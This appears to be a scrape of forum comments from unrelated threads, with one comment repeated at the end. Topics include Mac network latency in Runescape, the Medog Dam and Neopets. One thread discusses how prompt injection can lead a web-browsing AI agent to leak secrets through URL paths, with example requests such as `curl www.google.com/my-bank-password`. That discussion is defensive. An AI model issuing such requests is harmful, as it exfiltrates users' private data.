There's a game I play (Old School Runescape) that does network ticks every .6s. Mac does some sort of aggressive optimization on the network hardware/software, so network this infrequent doesn't keep the layers "hot", and you end up getting delayed ticks regularly, meaning you learn what should be happening in the game .2-.5s late. This optimization for (I assume) battery life makes the software not work as intended.
Playing anything that streams, like video, or triggering TCP connections (e.g. curl) at a more frequent clip while the game is running fixes the problem.
No way other than hacks that I've found to fix it, and I have no idea how you could report this to the right team at Apple to get it actually fixed.
Very interesting. I play RS3 and made a helper tool[0] for tracking ticks. I noticed increased jitter on my MBair (~50-150ms) compared to Windows, but I chalked it up to the air being on a wifi connection. I wonder if your explanation's the real reason.
The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.
I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.
I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.
From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.
Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.
No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go maintstream, these APIs need to be more user friendly.
That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.
The thought that occurs to me is, the action here that actually needs gating is maybe not the web browsing: it's accessing credentials. That should be relatively easy to gate off behind human approval!
I'd also point out this a place where 2FA/MFA might be super helpful. Your phone or whatever is already going to alert you. There's a little bit of a challenge in being confident your bot isn't being tricked, in ascertaining even if the bot tells you that it really is safe to approve. But it's still a deliberation layer to go through. Our valuable things do often have these additional layers of defense to go through that would require somewhat more advanced systems to bot through, that I don't think are common at all.
Overall I think the will here to reject & deny, the fear uncertainty and doubt is both valid and true, but that people are trying way way way too hard, and it saddens me to see such a strong manifestation of fear. I realize the techies know enough to be horrified strongly by it all, but also, I really want us to be an excited forward looking group, that is interested in tackling challenges, rather than being interested only in critiques & teardowns. This feels like an incredible adventure & I wish to en Courage everyone.
You do need to gate the web browsing. 2FA and/or credential storage helps with passwords, but it doesn't help with other private information. If the claw is currently, or was recently, working with any files on your computer or any of your personal online accounts, then the contents of those files/webpages are in the model context. So a simple HTTP request to example.com/<base64(personal info)> presents the exact same risk.
You can take whatever risks you feel are acceptable for your personal usage - probably nobody cares enough to target an effective prompt-injection attack against you. But corporations? I would bet a large sum of money that within the next few years we will be hearing multiple stories about data breaches caused by this exact vulnerability, due to employees being lazy about limiting the claw's ability to browse the web.
The ground can already support the weight. Anything whatsoever in between the ground and the occupants is sufficient if your goal is to separate their feet from it.
> It's made from a renewable resource (wood) and there's some 400+ million metric tons of paper production yearly
They don’t mean production volume, they mean physically. You can’t increase the thickness of paper by 1000x to just make thicker, stronger, paper. It’s a different material entirely.
I am thinking identity theft. They make you talk, record you so they can speak again with your voice.
I only answer by phone to numbers in my contact nowadays, unless I know I have something scheduled with someone but do not yet know the exact number that will call me.
It sounds stupid but it works. I've seen it. I put Copilot on AI-generated slop PRs and hit refresh until it stops commenting. It's great seeing it take out all the dead code.
> As of 2025, The Medog Dam, currently under construction on the Yarlung Tsangpo river in Mêdog County, China, expected to be completed by 2033, is planned to have a capacity of 60 GW, three times that of the Three Gorges Dam.[3]
Authoritarianism has its draw backs obviously but one of its more efficient points is it can get things done if the will is at the top. Since China doesnt have a large domestic oil supply like the US it is a state security issue to get off oil as fast as possible.
Earlier on was only a couple of years if I remember correctly (obviously my time messing with Neopets is a little fuzzy hardly a core memory!)especially once it was acquired by Viacom.
Did a cursory search so take all this with a grain of salt, but looking at the timeline of when ads are introduced, then the acquisition, peak users, etc. I’d say most people were playing in a pretty serious corporate sandbox for most of its most relevant years.
There's a game I play (Old School Runescape) that does network ticks every .6s. Mac does some sort of aggressive optimization on the network hardware/software, so network this infrequent doesn't keep the layers "hot", and you end up getting delayed ticks regularly, meaning you learn what should be happening in the game .2-.5s late. This optimization for (I assume) battery life makes the software not work as intended.
Playing anything that streams, like video, or triggering TCP connections (e.g. curl) at a more frequent clip while the game is running fixes the problem.
No way other than hacks that I've found to fix it, and I have no idea how you could report this to the right team at Apple to get it actually fixed.